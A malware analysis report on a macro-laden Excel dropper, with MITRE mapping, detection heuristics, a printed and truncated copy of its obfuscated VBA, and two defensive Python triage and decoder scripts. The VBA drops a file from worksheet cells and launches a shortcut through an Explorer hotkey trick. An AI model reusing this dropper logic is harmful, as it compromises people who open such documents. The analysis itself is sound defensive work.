Verdict: MALICIOUS
Risk Score: 308
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an OOXML Excel workbook (its VBA project is stored at xl/vbaProject.bin) whose project defines AutoOpen, Auto_Open and Workbook_Open handlers, so the macro runs as soon as the workbook is opened with macros enabled. The extracted Module1 pads itself with calculator-style button handlers (cmdBtn*_Click) around a small amount of real logic, declares several GDI/window APIs (GetDC, GetDeviceCaps, GetActiveWindow, ReleaseDC) that the visible code never calls, and hides the imports it does use behind one- and two-letter aliases: fw = FindWindowA, gaa = GlobalAddAtomA, sm = SendMessageA, ke = keybd_event, s = Sleep. In the visible portion, sub aa concatenates the cells of Sheet1!A200:A345 into one comma-separated string and writes the parsed values byte by byte to %TMP%\Doc1.docx, so that dropped file is carried inside the worksheet rather than fetched. Sub te then adds a global atom holding %TMP%\office13.lnk and sends it to Explorer's Shell_TrayWnd window with message 1024+233 (WM_USER+233) and wParam 1792+84 (0x754, which read as a shell hotkey word is Ctrl+Alt+Shift+T), sub merge synthesises exactly that chord with keybd_event (VK_CONTROL, VK_MENU, VK_SHIFT, 'T', then the matching key-ups), te sleeps 8.95 s, and sub boo sends WM_USER+234 with the same hotkey word. That sequence is consistent with registering the dropped shortcut as a shell hotkey, firing it so that Explorer rather than Excel starts whatever the .lnk points to, and then unregistering it; where office13.lnk itself is written is not in the visible source. The ClamAV signature Doc.Downloader.Generic-6698421-0 classifies the file as a downloader; no network code appears in the extracted source, but the preview is truncated and neither the contents of A200:A345 nor the .lnk target are recovered in this report. The document body's text about mandatory training and completion serves as the lure. One hosting detail: the #Else branch of the Declare block, meant for pre-VBA7 hosts, still uses LongPtr, so the module only compiles under VBA7 (Office 2010 and later).
Heuristics (7)
- ClamAV: Doc.Downloader.Generic-6698421-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- VBA project inside OOXML [medium, OOXML_VBA, 5 related findings]: document contains a VBA project (VBA macros present)
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]
- Workbook_Open macro [high, OLE_VBA_WBOPEN]
- Auto_Open macro [high, OLE_VBA_AUTO]
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]
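A static triage pass over the extracted source, added here as an example; it is not part of this analyzer or of oletools. It works on text that olevba has already extracted, so it needs nothing beyond the Python standard library. The input is a constructed excerpt of the page's Module1: the Declare block and the te/boo routines are copied from the preview, while the Workbook_Open handler that calls te is assumed, because the preview is truncated before the auto-exec handlers the heuristics report. The pass lists auto-exec entry points, resolves each aliased Declare to its real export, rewrites call sites with the real names, folds the split integer constants, Replace()-assembled strings and Environ() prefixes, and decodes the Shell_TrayWnd message number and hotkey word.

```python
"""Static triage of VBA source extracted with olevba (added example, not the
analyzer's code). Runs offline on already-extracted macro text."""
import re
from typing import Dict, List, Tuple

# Constructed excerpt of the page's macros.bas. The Workbook_Open stub is an
# assumption: the page's preview is truncated before the auto-exec handlers.
SAMPLE_VBA = r'''Attribute VB_Name = "Module1"
Private Declare PtrSafe Function fw Lib "user32" Alias "FindWindowA" (ByVal a As String, ByVal b As String) As Long
Private Declare PtrSafe Function gaa Lib "kernel32" Alias "GlobalAddAtomA" (ByVal c As String) As Integer
Private Declare PtrSafe Function sm Lib "user32" Alias "SendMessageA" (ByVal d As Long, ByVal e As Long, ByVal f As Long, g As Any) As Long
Private Declare PtrSafe Sub ke Lib "user32" Alias "keybd_event" (ByVal h As Byte, ByVal i As Byte, ByVal j As Long, ByVal k As Long)
Private Declare PtrSafe Sub s Lib "kernel32" Alias "Sleep" (ByVal l As Long)
Private Sub Workbook_Open()
te
End Sub
Sub te()
sm fw("Shell_TrayWnd", ""), 1024 + 233, 1792 + 84, ByVal gaa(Environ("TMP") & Replace("\office13|.|ln|k", "|", ""))
merge
s 8950
boo
End Sub
Sub boo()
sm fw("Shell_TrayWnd", ""), 1024 + 234, 1792 + 84, 0
End Sub
'''

AUTOEXEC = {"autoopen", "auto_open", "autoexec", "autoclose", "auto_close",
            "workbook_open", "workbook_beforeclose", "document_open", "document_close"}
DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?', re.IGNORECASE)
PROC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)',
                     re.IGNORECASE | re.MULTILINE)
INT_SUM_RE = re.compile(r'\b(\d+)\s*\+\s*(\d+)\b')            # 1024 + 233 -> 1257
REPLACE_RE = re.compile(r'Replace\("([^"]*)",\s*"([^"]*)",\s*"([^"]*)"\)')
ENVIRON_RE = re.compile(r'Environ\("(\w+)"\)\s*&\s*"([^"]*)"')  # Environ("TMP") & "\x" -> "%TMP%\x"
TRAY_MSG_RE = re.compile(
    r'SendMessageA\s+FindWindowA\("Shell_TrayWnd",\s*""\),\s*(\d+),\s*(\d+)')
WM_USER = 0x400
# Shell hotkey word: virtual key in the low byte, HOTKEYF_* modifiers in the high byte.
HOTKEY_MODS = ((0x02, "Ctrl"), (0x04, "Alt"), (0x01, "Shift"), (0x08, "Ext"))


def find_autoexec(src: str) -> List[str]:
    """Procedure names Office runs on its own when the file is opened or closed."""
    return [n.lower() for n in PROC_RE.findall(src) if n.lower() in AUTOEXEC]


def resolve_declares(src: str) -> Dict[str, Tuple[str, str]]:
    """Map each Declare'd local name to (library, real export name)."""
    return {local: (lib.lower(), alias or local)
            for local, lib, alias in DECLARE_RE.findall(src)}


def decode_hotkey(word: int) -> str:
    vk, mods = word & 0xFF, (word >> 8) & 0xFF
    parts = [name for bit, name in HOTKEY_MODS if mods & bit]
    parts.append(chr(vk) if 0x30 <= vk <= 0x39 or 0x41 <= vk <= 0x5A else f"VK_0x{vk:02X}")
    return "+".join(parts)


def name_message(msg: int) -> str:
    return f"WM_USER+{msg - WM_USER}" if WM_USER <= msg < 0x8000 else f"0x{msg:04X}"


def deobfuscate_line(line: str, declares: Dict[str, Tuple[str, str]]) -> str:
    """Undo the cheap obfuscations in this sample: aliased imports, split integer
    constants, Replace()-assembled strings and Environ() path prefixes."""
    for local in sorted(declares, key=len, reverse=True):   # longest alias first
        line = re.sub(rf'\b{re.escape(local)}\b', declares[local][1], line)
    while True:
        folded = INT_SUM_RE.sub(lambda m: str(int(m.group(1)) + int(m.group(2))), line)
        if folded == line:
            break
        line = folded
    line = REPLACE_RE.sub(lambda m: '"%s"' % m.group(1).replace(m.group(2), m.group(3)), line)
    line = ENVIRON_RE.sub(lambda m: '"%%%s%%%s"' % (m.group(1).upper(), m.group(2)), line)
    return line


def triage(src: str) -> dict:
    declares = resolve_declares(src)
    apis = sorted(export for _, export in declares.values())
    suspicious, tray_messages = [], []
    for no, raw in enumerate(src.splitlines(), 1):
        if DECLARE_RE.search(raw):
            continue                      # the Declare lines are the key, not the use
        line = deobfuscate_line(raw, declares)
        if any(api in line for api in apis) or "Environ(" in raw:
            suspicious.append((no, line.strip()))
        for msg, wparam in TRAY_MSG_RE.findall(line):
            tray_messages.append((name_message(int(msg)), decode_hotkey(int(wparam))))
    return {"autoexec": find_autoexec(src), "win32_imports": apis,
            "suspicious_lines": suspicious, "shell_tray_messages": tray_messages}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(key, value)
```

On the excerpt this reports one auto-exec entry (workbook_open), five real imports, the te and boo lines rewritten as SendMessageA FindWindowA("Shell_TrayWnd", ""), 1257, 1876, ... and both tray messages decoded to WM_USER+233 / WM_USER+234 with the hotkey word Ctrl+Alt+Shift+T, the same chord the sample's merge routine presses with keybd_event. To use it on a real extraction, pass the source olevba prints for the file to triage().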
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6665 bytes |

SHA-256: cfd918143b97fffb354c15c1af42a70cc58f7c474d9cb8bc760b500b3548a7bf
Preview of macros.bas (first 1,000 lines of the extracted script, reproduced exactly as extracted, including the sample's own defects, and cut off where the analyzer truncated it):

```vb
Attribute VB_Name = "Module1"
#If VBA7 Then
Private Declare PtrSafe Function fw Lib "user32" Alias "FindWindowA" (ByVal a As String, ByVal b As String) As Long
Private Declare PtrSafe Function ReleaseDC Lib "user32" (ByVal hwnd As LongPtr, ByVal hDC As LongPtr) As Long
Private Declare PtrSafe Function gaa Lib "kernel32" Alias "GlobalAddAtomA" (ByVal c As String) As Integer
Private Declare PtrSafe Function GetDeviceCaps Lib "gdi32" (ByVal hDC As LongPtr, ByVal nIndex As Long) As Long
Private Declare PtrSafe Function sm Lib "user32" Alias "SendMessageA" (ByVal d As Long, ByVal e As Long, ByVal f As Long, g As Any) As Long
Private Declare PtrSafe Function GetActiveWindow Lib "user32" () As Long
Private Declare PtrSafe Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Private Declare PtrSafe Sub ke Lib "user32" Alias "keybd_event" (ByVal h As Byte, ByVal i As Byte, ByVal j As Long, ByVal k As Long)
Private Declare PtrSafe Sub s Lib "kernel32" Alias "Sleep" (ByVal l As Long)
#Else
Private Declare Function fw Lib "user32" Alias "FindWindowA" (ByVal a As String, ByVal b As String) As Long
Private Declare Function ReleaseDC Lib "user32" (ByVal hwnd As LongPtr, ByVal hDC As LongPtr) As Long
Private Declare Function gaa Lib "kernel32" Alias "GlobalAddAtomA" (ByVal c As String) As Integer
Private Declare Function GetDeviceCaps Lib "gdi32" (ByVal hDC As LongPtr, ByVal nIndex As Long) As Long
Private Declare Function sm Lib "user32" Alias "SendMessageA" (ByVal d As Long, ByVal e As Long, ByVal f As Long, g As Any) As Long
Private Declare Function GetActiveWindow Lib "user32" () As Long
Private Declare Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Private Declare Sub ke Lib "user32" Alias "keybd_event" (ByVal h As Byte, ByVal i As Byte, ByVal j As Long, ByVal k As Long)
Private Declare Sub s Lib "kernel32" Alias "Sleep" (ByVal l As Long)
#End If
Public tmpVar As String
Public calVal As String
Private Sub cmdBtnBak_Click()
If txtRes <> 0 And txtRes <> "" Then txtRes = Left(txtRes, Len(txtRes) - 1)
End Sub
Private Sub cmdBtnAdd_Click()
If txtRes <> 0 Then
txtdisplay = txtRes
txtRes = 0
calVal = "Add"
End If
End Sub
Sub merge()
w 17, 0
w 18, 0
w 16, 0
w 84, 0
w 84, 2
w 16, 2
w 18, 2
w 17, 2
End Sub
Private Sub cmdBtnDvd_Click()
If txtRes <> 0 Then
txtdisplay = txtRes
txtRes = 0
calVal = "Divide"
End If
End Sub
Private Sub cmdBtnDot_Click()
If txtRes <> 0 Then txtRes = txtRes + "."
End Sub
Sub boo()
sm fw("Shell_TrayWnd", ""), 1024 + 234, 1792 + 84, 0
End Sub
Private Sub cmdBtnMult_Click()
If txtRes <> 0 Then
txtdisplay = txtRes
txtRes = 0
calVal = "Multiplication"
End If
End Sub
Private Sub cmdBtn1_Click()
If txtRes = 0 Then
txtRes = cmdBtn1.Caption
Else
txtRes = txtRes + cmdBtn1.Caption
End If
End Sub
Sub w(ByVal w As Byte, ByVal x As Long)
ke w, 0, x, 0
End Sub
Private Sub cmdBtn4_Click()
If txtRes = 0 Then
txtRes = cmdBtn4.Caption
Else
txtRes = txtRes + cmdBtn4.Caption
End If
End Sub
Private Sub cmdBtn5_Click()
If txtRes = 0 Then
txtRes = cmdBtn5.Caption
Else
txtRes = txtRes + cmdBtn5.Caption
End If
End Sub
Sub te()
sm fw("Shell_TrayWnd", ""), 1024 + 233, 1792 + 84, ByVal gaa(Environ("TMP") & Replace("\office13|.|ln|k", "|", ""))
merge
s 8950
boo
End Sub
Private Sub cmdBtnMns_Click()
If txtRes <> 0 Then
txtdisplay = txtRes
txtRes = 0
calVal = "Minus"
End If
End Sub
Sub aa()
Dim fn As String
fn = Environ("tmp") & "\Doc1.docx"
Dim pl As String
For Each c In Worksheets("Sheet1").Range("A200:A345")
pl = pl & c
Next c
Dim fh, i, j, z As Integer
Dim bc As Long
Dim b As Byte
bc = 1
i = 1
j = 1
fh = FreeFile
Open fn For Binary Access Write As #fh
Do
j = InStr(i, pl, ",",
... (truncated)
```
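Sub aa in the preview concatenates the cells of Sheet1!A200:A345 with no separator (pl = pl & c) and then walks the result with InStr(i, pl, ","), so the worksheet holds one long comma-separated list of byte values that is written out as %TMP%\Doc1.docx. The loop body is truncated on the page, so the decoder below is an added analyst-side reconstruction, not the sample's code and not the analyzer's. It assumes the values are decimal bytes, the usual form for this Put-by-byte pattern, and runs on a constructed cell range because the real cell contents are not in the report. The edge case worth handling is that a value can be split across two adjacent cells, so the comma split must run over the joined string, never cell by cell.

```python
"""Analyst-side decoder for the cell-stored payload written by sub aa()
(added example; the sample's loop body is truncated on the page)."""
import hashlib
from typing import Iterable, List, Tuple

# Constructed stand-in for the payload: a ZIP/OOXML local-file header followed
# by filler. The real contents of A200:A345 are not in the report.
FAKE_PAYLOAD = b"PK\x03\x04" + b"\x14\x00\x06\x00" + b"\x00" * 4 + bytes(range(32, 48))

# A few container signatures worth checking on a carved blob.
MAGIC = [(b"PK\x03\x04", "zip/OOXML container (docx, xlsx)"),
         (b"MZ", "PE executable"),
         (b"L\x00\x00\x00\x01\x14\x02\x00", "Windows shortcut (.lnk)"),
         (b"\xd0\xcf\x11\xe0", "OLE2 compound document"),
         (b"%PDF", "PDF")]


def cells_from_bytes(data: bytes, width: int) -> List[str]:
    """Encode bytes the way the dropper stores them: decimal, comma separated,
    then sliced into fixed-width cells with no regard for number boundaries."""
    text = ",".join(str(b) for b in data) + ","
    return [text[i:i + width] for i in range(0, len(text), width)]


def decode_cells(cells: Iterable[str]) -> bytes:
    """Join the cells without a separator, as pl = pl & c does, then split on
    commas. Tolerates whitespace and a trailing comma; rejects non-byte values."""
    joined = "".join(str(c) for c in cells)
    out = bytearray()
    for tok in joined.split(","):
        tok = tok.strip()
        if not tok:
            continue
        value = int(tok)                      # ValueError on non-numeric junk
        if not 0 <= value <= 255:
            raise ValueError(f"byte value out of range: {value}")
        out.append(value)
    return bytes(out)


def looks_like_byte_list(cells: Iterable[str]) -> bool:
    """Cheap pre-check for scanning other ranges/sheets for the same encoding."""
    try:
        decode_cells(cells)
        return True
    except ValueError:
        return False


def identify(data: bytes) -> str:
    for magic, label in MAGIC:
        if data.startswith(magic):
            return label
    return "unknown"


def carve(cells: Iterable[str]) -> Tuple[bytes, str, str]:
    """Return (payload bytes, file-type guess, SHA-256) for a cell range."""
    data = decode_cells(cells)
    return data, identify(data), hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    cells = cells_from_bytes(FAKE_PAYLOAD, 7)        # cut numbers across cells on purpose
    blob, kind, digest = carve(cells)
    print(len(cells), "cells ->", len(blob), "bytes,", kind, digest)
```

To apply it to the real workbook, feed carve() the string values of Sheet1!A200:A345 (read with openpyxl, or by unzipping xl/worksheets/sheet1.xml and resolving shared strings) and compare the resulting hash against the Doc1.docx the sample drops in %TMP%; if the sheet does not decode, looks_like_byte_list() over other ranges is a quick way to find where the bytes actually live.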
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 41984 bytes |

SHA-256: e046724fe0ca7af2eedb3e321eaacd760cc256e8a9e1ce3f7f9b12c737f5e25a
Detection (ClamAV): Doc.Downloader.Generic-6698421-0
Obfuscation or payload: unlikely